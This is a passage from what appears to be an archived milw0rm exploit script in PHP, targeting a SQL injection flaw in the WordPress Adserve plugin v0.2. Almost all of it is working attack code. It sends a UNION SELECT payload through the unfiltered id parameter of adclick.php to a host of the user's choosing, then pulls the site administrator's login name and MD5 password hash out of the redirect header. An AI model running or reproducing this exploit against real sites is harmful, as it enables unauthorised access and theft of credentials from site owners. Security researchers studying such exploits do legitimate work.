get_var("SELECT url FROM $table_name WHERE id=$id;"); # # # # Exploit # # id variable isnt filtered so we can inject and check the output in the Location response-header # If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved # # echo "\n"; echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."\n"; echo "-------------------coded by : enter_the_dragon--------------------"."\n"; echo "------------------------------------------------------------------"."\n"; if ($argc!=3) { echo " Usage: $argv[0] target_host wp_path \n"; echo " target_host: Your target ex www.target.com \n"; echo " wp_path: WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder"; echo "\n"; exit; } $query=$argv[1]; $query.=$argv[2]; $query.="wp-content/plugins/wp-adserve/adclick.php?"; $query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users"; if(function_exists(curl_init)) { $ch = curl_init("http://$query"); curl_setopt($ch, CURLOPT_HEADER,true); curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,10); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)"); $html=curl_exec($ch); $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE); curl_close($ch); if($returncode==302) { $pattern="/\|(.*)?\|([a-z0-9]{32})\|/"; if(preg_match($pattern,$html,$matches)) { $adminusername=$matches[1]; $adminpass=$matches[2]; echo "Admin Login:$adminusername\n" ; echo "Admin Pass :$adminpass\n"; } } else { exit ("Exploit Failed :( \n"); } } else exit("Error:Libcurl isnt installed \n"); ?> # milw0rm.com [2008-01-30]